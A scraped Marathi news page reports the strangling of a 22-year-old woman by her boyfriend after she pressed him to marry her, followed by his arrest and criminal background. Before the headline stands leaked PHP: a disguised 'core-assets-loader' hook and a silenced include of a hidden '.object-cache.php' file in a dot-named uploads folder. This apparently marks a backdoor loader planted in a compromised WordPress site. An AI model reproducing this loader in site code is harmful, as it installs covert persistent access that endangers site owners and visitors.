add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); लग्नाची मागणी करणाऱ्या प्रेयसीचा खून – SOCH INDIA
Menu

देश
लग्नाची मागणी करणाऱ्या प्रेयसीचा खून

nobanner

लग्नाची मागणी करणाऱ्या प्रेयसीचा प्रियकराने गळा आवळून खून के ला. ही घटना सदर पोलीस ठाण्याच्या हद्दीतील मंगळवारी कॉम्प्लेक्स परिसरात सोमवारी उघडकीस आली. या घटनेने परिसरातील महाविद्यालयातील तरुणांमध्ये एकच खळबळ उडाली. पण, मृत तरुणी ही महाविद्यालयांबाहेर असल्याची बाब स्पष्ट झाली.

हुस्ना जबीन शेख (२२) रा. महेंद्रनगर, टेका असे मृत  तरुणीचे नाव आहे. याप्रकरणी पोलिसांनी खुनाचा गुन्हा दाखल करून प्रियकर आसिफ शेख (२२) ला अटक के ली. हुस्ना ही सीताबर्डी झांशी राणी चौकातील फायडॉक्स टेक्नॉलाजी या दुकानात काम करीत होती. याच दुकानात तिची आसिफशी ओळख झाली. त्यानंतर मैत्री आणि मैत्रीचे रूपांतर प्रेमात झाले. त्यांच्या प्रेमाची माहिती हुस्नाच्या कु टुंबीयांना मिळाली. दोघांच्याही कु टुंबाचा त्यांच्या विवाहाला विरोध होता. पण, हुस्ना त्याला विवाहाकरिता गळ घालत होती. आसिफ याची विवाहाची इच्छा नव्हती. तो तिला टाळत होता. त्यामुळे दोघांमध्ये वाद सुरू होता. गेल्या काही दिवसांपासून ती तणावात होती. त्यामुळे रविवारी तिने आसिफला भेटण्यासाठी मंगळवारी कॉप्लेक्सजवळ बोलवले. त्या ठिकाणी ते भेटले.  तेथून ते शारदा चौकात गेले. नाश्ता के ल्यानंतर पुन्हा ते कॉम्प्लेक्समध्ये परतले. यावेळीही तिने त्याच्याकडे लग्नासाठी तगादा लावला. रात्र बरीच झाली होती. दोघांमध्ये प्रचंड वाद झाला व त्याने तिच्याच ओढणीने गळा आवळून तिचा खून के ला. पहाटे परिसरातील नाश्ता व चहाच्या दुकानदारांना  तरुणी बेशुद्धावस्थेत पडलेली दिसली. त्यांनी पोलिसांना कळवले. याप्रकरणी पोलिसांनी गुन्हा दाखल करून आरोपीस चार तासांत अटक के ली.

अशी पटली ओळख

हुस्नाच्या मृतदेहाजवळ एक बॅग होती. त्या बॅगमध्ये तिचे बरेच साहित्य होते. कदाचित ती त्याच्यासोबत जाण्याच्या बेताने घराबाहेर पडली होती. त्यात तिचा आधार कार्डही होता. आधार कार्डवरून तिची ओळख पटली व संपूर्ण माहिती घेऊन पोलिसांनी आरोपीला अटक के ली.

आसिफ गुन्हेगारी प्रवृत्तीचा

आशिफ हा गुन्हेगारी प्रवृत्तीचा असून त्याच्याविरुद्ध अनेक गुन्हेही दाखल आहेत. त्याला काही महिन्यांपूर्वी तडिपार करण्यात आले होते. याची माहिती हुस्नाच्या कुटुंबीयांना होती. त्यामुळे त्यांनी तिला आसिफसोबत संबंध न ठेवण्यास सांगितले होते. काही दिवसांपूर्वी दोन्ही परिवारांमध्ये वादही झाला होता, अशी माहिती समोर येत आहे.